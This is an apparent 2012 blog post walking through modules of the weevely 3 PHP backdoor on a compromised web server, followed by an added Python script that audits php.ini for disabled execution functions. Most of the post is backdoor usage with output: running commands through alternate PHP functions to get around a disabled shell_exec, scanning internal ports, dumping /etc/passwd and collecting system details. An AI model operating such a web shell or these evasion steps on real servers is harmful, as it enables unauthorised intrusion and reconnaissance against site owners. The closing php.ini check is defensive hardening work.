PHP backdoor weevely 3: modules
Posted on 2012-8-26 19:50:02
Finding the web path

    www-data@ubuntu:/var/www$ :find.webdir
    [find.webdir] Writable web folder: '/var/www/' -> 'http://5.5.5.4//'
    True
    www-data@ubuntu:/var/www$

Key point: running commands
It provides these functions: system, passthru, shell_exec, exec, pcntl_exec, popen, python_eval, perl->system, proc_open. On most servers shell_exec is disabled, so switch to another function to run the command.
View the help

    www-data@ubuntu:/var/www$ :shell.sh
    [!] Error, required parameters: 'cmd'
    [!] Usage: <cmd> [stderr]
    cmd =                           Shell command
    stderr = True                  Print standard error  Type: 'bool' (True, False)
    vector = system          Specify vector (system, passthru, shell_exec, exec, pcntl_exec, popen, python_eval, perl->system, proc_open)

I run it with PHP's popen function

    www-data@ubuntu:/var/www$ :shell.sh cmd=id vector=popen
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@ubuntu:/var/www$

Switching to the Python one

    www-data@ubuntu:/var/www$ :shell.sh cmd=id vector=python_eval
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    www-data@ubuntu:/var/www$

Finding network interfaces

    www-data@ubuntu:/var/www$ :net.ifaces
    eth0: 5.5.5.4/24
    eth1: 10.0.3.15/24
    lo: 127.0.0.1/8
    www-data@ubuntu:/var/www$

Port scan

    www-data@ubuntu:/var/www$ :net.scan addr=127.0.0.1 port=1-10000

Returns:

    OPEN: 127.0.0.1:3306

Reading information files

    www-data@ubuntu:/var/www$ :audit.etc_passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
    syslog:x:101:103::/home/syslog:/bin/false
    sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
    mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
    brk:x:1000:1000:brk,,,:/home/brk:/bin/bash

System information

    www-data@ubuntu:/var/www$ :system.info
    whoami:                        www-data
    hostname:                ubuntu
    basedir:                /var/www
    uname:                        Linux ubuntu 2.6.35-22-generic-pae #33-Ubuntu SMP Sun Sep 19 22:14:14 UTC 2010 i686 GNU/Linux
    os:                        Linux
    document_root:                /var/www
    safe_mode:                0
    script:                        /door.php
    client_ip:                5.5.5.2
    max_execution_time:        30
    php_self:                /door.php
    www-data@ubuntu:/var/www$




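Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a blade.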
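The post observes that disabling shell_exec alone achieves little, because the tool falls back to another function from its vector list. As an added example (not part of the original post), this Python check reads php.ini text and reports which of the listed PHP execution functions are still callable; the sample ini contents are constructed, and python_eval and perl->system are left out on the assumption that they depend on optional extensions outside the scope of this check.

```python
import re

# PHP command-execution functions named as vectors in the post.
# python_eval and perl->system are omitted (assumption: they come from
# optional extensions and are reviewed separately).
EXEC_FUNCTIONS = ["system", "passthru", "shell_exec", "exec",
                  "pcntl_exec", "popen", "proc_open"]


def disabled_functions(ini_text):
    """Return the set named by the last active disable_functions directive."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()      # ';' starts a php.ini comment
        m = re.match(r"disable_functions\s*=\s*(.*)$", line)
        if m:
            value = m.group(1).strip().strip('"\'')
            # A later directive replaces an earlier one; it does not add to it.
            disabled = {f.strip() for f in value.split(",") if f.strip()}
    return disabled


def audit(ini_text):
    """Split the post's vectors into (still_callable, blocked)."""
    off = disabled_functions(ini_text)
    still_callable = [f for f in EXEC_FUNCTIONS if f not in off]
    blocked = [f for f in EXEC_FUNCTIONS if f in off]
    return still_callable, blocked


# Constructed samples: a php.ini that blocks only shell_exec (the situation
# the post describes) and one that blocks every listed function.
WEAK_INI = """
[PHP]
; disable_functions = system,exec   (commented out, has no effect)
disable_functions = shell_exec
"""
HARDENED_INI = """
[PHP]
disable_functions = system, passthru, shell_exec, exec, pcntl_exec, popen, proc_open
"""

if __name__ == "__main__":
    for name, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        still, blocked = audit(ini)
        print(f"{name}: callable={still} blocked={blocked}")
```
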
